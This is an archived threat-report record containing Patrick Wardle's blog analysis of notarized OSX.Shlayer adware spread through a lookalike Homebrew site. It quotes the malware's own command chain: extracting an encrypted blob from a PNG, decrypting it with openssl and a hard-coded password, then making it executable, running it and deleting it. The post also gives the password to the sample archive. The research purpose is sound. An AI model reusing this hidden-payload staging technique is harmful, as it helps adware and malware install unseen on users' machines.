{ "id": "164e6c2a-c106-4058-8b2d-9dad78344ed5", "created_at": "2026-04-06T00:15:06.38495Z", "updated_at": "2026-04-10T03:30:33.312992Z", "deleted_at": null, "sha1_hash": "4e429bb3b88032719ed18ea2bd7dda380bf7710d", "title": "Apple Approved Malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5286780, "plain_text": "Apple Approved Malware\r\nArchived: 2026-04-05 19:45:03 UTC\r\nApple Approved Malware\r\nmalicious code ...now notarized!? #2020\r\nby: Patrick Wardle / August 30, 2020\r\nLove these blog posts and/or want to support my research and tools? You can support them via my Patreon page!\r\nšŸ“ šŸ‘¾ Want to play along?\r\nIā€™ve added the samples (ā€˜OSX.Shlayerā€™) to our malware collection (password: infect3d)\r\nā€¦please donā€™t infect yourself!\r\nBackground\r\nIt wasnā€™t too long ago, that Appleā€™s website stated:\r\n\"[Macs] doesn't get PC viruses. A Mac isnā€™t susceptible to the thousands of viruses plaguing Windows-based computers. That's thanks to built-in defenses in Mac OS X that keep you safe without any work\r\non your part\" -Apple.com\r\nThe ā€œtruthā€ of this nuanced statement lies in the fact that due to inherent cross-platform incompatibilities (not\r\nAppleā€™s ā€œdefensesā€): a native Windows virus cannot directly execute on macOS.\r\nHowever even this claim is rather subjective as was highlighted in 2019 by a Windows adware specimen targeting\r\nmacOS users. The adware was packaged with a cross-platform framework (Mono) that allowed Windows binaries\r\n(.exes) to ā€œnativelyā€ run on macOS!\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 1 of 13\n\nAnd, even back in 2012, thanks to Java, cross-platform malware could be found targeting both Windows and\r\nmacOS.\r\nToday, malicious code targeting macOS, unfortunately, is far too common. Kaspersky, in a 2019 report titled\r\nā€œThreats to macOS usersā€, noted a sharp uptick in threats targeting Macs:\r\n\"Threats to macOS users\" (Kaspersky)\r\nā€¦while Malwarebytes stated in their ā€œ2020 State of Malware Reportā€:\r\n\"And for the first time ever, Macs outpaced Windows PCs in number of threats detected per endpoint.\" -\r\nMalwarebytes\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 2 of 13\n\nThreats per endpoint, Macs vs. Windows (Malwarebytes)\r\nIt is important to note these statistics include both adware (and potentially unwanted programs). And the reality is,\r\nif a Mac user is infected with malicious code, more than likely, it not going to be some advanced nationstate\r\nbackdoor, but rather adware (or malware that installs various adware). Unfortunately, such adware and adware\r\ncampaigns are rather prolific, and their prevalence is only increasing as Mac become ever more popular:\r\n\"The vast majority of threats for macOS in 2019 were in the AdWare category.\" -Kaspersky\r\nIt is also important not to underestimate the potential impact of adware, upon its victims. The noted security\r\nresearcher, Thomas Reed articulates this well in a recent writeup:\r\n\"However, adware and PUPs can actually be far more invasive and dangerous on the Mac than ā€œrealā€\r\nmalware. They can intercept and decrypt all network traffic, create hidden users with static passwords,\r\nmake insecure changes to system settings, and generally dig their roots deep into the system so that it is\r\nincredibly challenging to eradicate completely.\" -Thomas Reed\r\nClearly to in order to protect both users and the perception of security, Apple had to take steps to address the ever\r\nrising tide of malicious code targeting macOS.\r\nTheir (most recent) answer? Code Notarization Requirements.\r\nNotarization\r\nThe main goal of notarization is to allow Apple to ā€œscan ā€¦software for malicious contentā€ before it is distributed\r\nto macOS users. The idea was that malicious code would of course, not be notarized and thus the majority to\r\nattacks targeting macOS users (adware campaigns, etc) would be thwarted.\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 3 of 13\n\nApple introduced notarization requirements in macOS 10.15 (Catalina), detailing the topic in an apply named\r\ndocument, ā€œNotarizing macOS Softwareā€:\r\nIn short, developers must now submit their applications to Apple before distribution to macOS users. This ensures\r\nthat Apple can inspect (and approve) all software before it is allowed to run on (recent versions of) macOS:\r\n\"Notarization gives users more confidence that the Developer ID-signed software you distribute has\r\nbeen checked by Apple for malicious components.\" -Apple.com\r\nIf software has not been notarized, it will be blocked by macOS (with no option to run it, via the alert prompt):\r\nunnotarized software: blocked!\r\nThe following provides a conceptual overview of the notarization process, and its impact to both malware and\r\nhacking operations:\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 4 of 13\n\nWith the goal of stymieing the influx of malicious code targeting macOS, notarization seemed like a promising\r\nidea.\r\nā€¦sadly, not all promises are kept.\r\nA Notarized Adware Campaign\r\nMany developers are familiar with the Homebrew, hosted at brew.sh:\r\nthe (legitimate) Homebrew website\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 5 of 13\n\nOn Friday, twitter user Peter Dantini (@PokeCaptain) noticed that the website homebrew.sh (not to be confused\r\nwith the legitimate Homebrew website brew.sh), was hosting an active adware campaign. If a user inadvertently\r\nvisited homebrew.sh , after various redirects an update for ā€œAdobe Flash Playerā€ would be aggressively\r\nrecommended:\r\n(fake) Abode Flash Player update(s)\r\nKudos to Peter for uncovering this adware campaign, and sharing the details with me!\r\nMahalo Peter! šŸ™šŸ½\r\nNormally such campaigns are rather prosaic and utilize unnotarized code. As such, they are normally stopped\r\nshort in their tracks by Appleā€™s new notarization requirements. For example here, we have a similar adware\r\ncampaign leveraging unnotarized payloads ā€¦that, as expected macOS will block:\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 6 of 13\n\nunnotarized adware? blocked!\r\nNote that in the above alert, the only options are ā€œMove to Trashā€ and ā€œCancelā€.\r\nThere is no option to allow the user to run the unnotarized software.\r\nInterestingly, Peter noticed the campaign originating from homebrew.sh , leveraged adware payloads were\r\nactually fully notarized! šŸ˜±\r\nWe can confirm the payloads are indeed notarized via the spctl command (note the \"source=Notarized\r\nDeveloper ID\" ):\r\n$ spctl -a -vvv -t install /Volumes/Install/Installer.app\r\n/Volumes/Install/Installer.app: accepted\r\nsource=Notarized Developer ID\r\norigin=Developer ID Application: Morgan Sipe (4X5KZ42L4B)\r\n$ spctl -a -vvv -t install /Users/patrick/Downloads/Player.pkg\r\n/Users/patrick/Downloads/Player.pkg: accepted\r\nsource=Notarized Developer ID\r\norigin=Developer ID Installer: Darien Watkins (NC43XU5Z95)\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 7 of 13\n\nAs far as I know, this is a first: malicious code gaining Appleā€™s notarization ā€œstamp of approvalā€.\r\nWhat does this mean?\r\nThese malicious payloads were submitted to Apple, prior to distribution.\r\nApple scanned and apparently detecting no malice, (inadvertently) notarized them.\r\nNow notarized, these malicious payloads are allowed to run ā€¦even on macOS Big Sur.\r\nAgain, due to their notarization status, users will (quite likely), fully trust these malicious samples.\r\nnotarized malware on Big Sur? ...yups\r\nTriaging the Payloads\r\nSo what are the notarized payloads?\r\n$ shasum *\r\n43a44d4f58774157857d04d67a9fef7045dacb2f AdobeFlashPlayer.dmg\r\nd28d75c9f61d20aa990e80e88ed8f3deb37b7f7f AdobeFlashPlayerInstaller.dmg\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 8 of 13\n\n52873957878e37d412cd5dabddfb770bcbdf5783 MediaPlayer.dmg\r\nb801963a180d253741be08dfbb7a5ed27964ac14 Player.pkg\r\nā€¦they appear to be, the rather infamous OSX.Shlayer malware.\r\nRunning the (notarized) payloads in an instrumented virtual machine captures (via our open-source\r\nProcessMonitor), the execution of various shell commands via bash :\r\n# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"signing info (computed)\" : {\r\n \"signatureID\" : \"com.apple.bash\",\r\n ...\r\n ]\r\n },\r\n \"uid\" : 501,\r\n \"arguments\" : [\r\n \"sh\",\r\n \"-c\",\r\n \"tail -c +1381 \\\"/Volumes/Install/Installer.app/Contents/Resources/main.png\\\" | openssl enc -ae\r\n ],\r\n \"ppid\" : 1447,\r\n \"pid\" : 1546\r\n },\r\n \"timestamp\" : \"1399-06-04 08:18:33 +0000\"\r\n}\r\nLetā€™s break down these commands:\r\ntail -c +1381 \\\"/Volumes/Install/Installer.app/Contents/Resources/main.png\\\"\r\nExtracts bytes from main.png starting at offset 1381\r\nopenssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass\r\n\\\"pass:0.6effariGgninthgiL0.6\\\r\nDecodes the output from the tail command into a file: /tmp/ZQEifWNV2l\r\nchmod 777 /tmp/ZQEifWNV2l\r\nChanges the file mode, to (amongst other things) fully accessible and executable.\r\n/tmp/ZQEifWNV2l \\\"/Volumes/Install/Installer.app/Contents/MacOS/pine\\\"\r\nExecutes the file ZQEifWNV2l , passing in Installer.app/... as a command line argument.\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 9 of 13\n\nrm -rf /tmp/ZQEifWNV2l\r\nDeletes the ZQEifWNV2l file.\r\nThe use of openssl in this manner is a clear indicator of OSX.Shlayer (as is the use of fake Flash installers, and\r\nother IoCs).\r\nOlder variants of OSX.Shlayer used a slightly different syntax:\r\nopenssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:2833846567 \u003c\"$fileDir\"/Resources/enc\r\nOSX.Shlayer is massively common, with Kaspersky noting it may be the most prevalent malware infecting\r\nmacOS systems:\r\n\"As for the malware threats, the Shlayer family, which masquerades as Adobe Flash Player or an update\r\nfor it, has been the most prevalent.\" -Kaspersky\r\nAnd what is the ultimate goal of OSX.Shlayer ? As noted in my previous analysis of this malware:\r\n\"The goal of the malware [OSX.Shlayer] is to download and persistently install various macOS\r\nadware.\" -The Mac Malware of 2018 (OSX.Shlayer)\r\nRecall this variant of OSX.Shlayer decoded and executed a binary named ZQEifWNV2l . Uploading and scanning\r\nthe ZQEifWNV2l file on VirusTotal, confirms that it is indeed adware:\r\nOSX.Shlayer's payload? Bundlore\r\nā€¦specifically (a variant?) of the persistent Bundlore adware.\r\nOSX.Shlayer has been known to be quite innovative (i.e. with manual methods of bypassing recent macOS\r\nsecurity mechanism):\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 10 of 13\n\nAs such, it not too surprising that this insidious malware has continued to evolve to trivially side-step Appleā€™s best\r\nefforts.\r\nConclusion\r\nIn Appleā€™s own words, notarization was supposed to ā€œgive users more confidence that [software] ā€¦has been\r\nchecked by Apple for malicious components.ā€\r\nUnfortunately a system that promises trust, yet fails to deliver, may ultimately put users at more risk. How so? If\r\nMac users buy into Appleā€™s claims, they are likely to fully trust any and all notarized software. This is extremely\r\nproblematic as known malicious software (such as OSX.Shlayer ) is already (trivially?) gaining such notarization!\r\nTo Appleā€™s credit, once I reported the notarized payloads, they were quick to revoked their certificates (and thus\r\nrescind their notarization status):\r\n$ spctl -a -vvv -t install /Volumes/Install/Installer.app\r\n/Volumes/Install/Installer.app: notarization indicates this code has been revoked\r\nThus, these malicious payloads will now, no longer run on macOS. Hooray!\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 11 of 13\n\n(previously notarized) payloads, now blocked!\r\nā€¦still, the fact that known malware got notarized in the first place, raises many questions šŸ¤”\r\nUpdate\r\nAs noted, Apple (quickly-ish) revoked the Developer code-signing certificate(s) that were used to sign the\r\nmalicious payloads. This occurred on Friday, Aug. 28th.\r\nInterestingly, as of Sunday (Aug 30th) the adware campaign was still live and serving up new payloads.\r\nUnfortunately these new payloads are (still) notarized:\r\n$ spctl -a -vvv -t install /Volumes/Installer/Installer.app\r\n/Volumes/Installer/Installer.app: accepted\r\nsource=Notarized Developer ID\r\norigin=Developer ID Application: Aimee Shorter (73KF97486K)\r\nWhich means even on Big Sur, they will (still) be allowed to run:\r\nBig Sur, prompts, but allows\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 12 of 13\n\nIf we extract the code-signing time stamp, we can see this (new) payload was signed on Friday PM ( Aug 28,\r\n2020 at 1:04:04 PM HST ) ā€¦likely after Appleā€™s initial ā€œresponseā€?\r\n$ codesign -dvvv /Volumes/Installer/Installer.app\r\nExecutable=/Volumes/Installer/Installer.app/Contents/MacOS/Ethernet\r\nIdentifier=com.Ethernet.bundle.installer\r\nFormat=app bundle with Mach-O thin (x86_64)\r\n...\r\nAuthority=Developer ID Application: Aimee Shorter (73KF97486K)\r\nAuthority=Developer ID Certification Authority\r\nAuthority=Apple Root CA\r\nTimestamp=Aug 28, 2020 at 1:04:04 PM\r\nBoth the old and ā€œnewā€ payload(s) appears to be nearly identical, containing OSX.Shlayer packaged with the\r\nBundlore adware.\r\nHowever the attackersā€™ ability to agilely continue their attack (with other notarized payloads) is noteworthy.\r\nClearly in the never ending cat \u0026 mouse game between the attackers and Apple, the attackers are currently (still)\r\nwinning. šŸ˜¢\r\nšŸ’• Support Us:\r\nLove these blog posts? You can support them via my Patreon page!\r\nSource: https://objective-see.com/blog/blog_0x4E.html\r\nhttps://objective-see.com/blog/blog_0x4E.html\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://objective-see.com/blog/blog_0x4E.html" ], "report_names": [ "blog_0x4E.html" ], "threat_actors": [ { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434506, "ts_updated_at": 1775791833, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4e429bb3b88032719ed18ea2bd7dda380bf7710d.pdf", "text": "https://archive.orkl.eu/4e429bb3b88032719ed18ea2bd7dda380bf7710d.txt", "img": "https://archive.orkl.eu/4e429bb3b88032719ed18ea2bd7dda380bf7710d.jpg" } }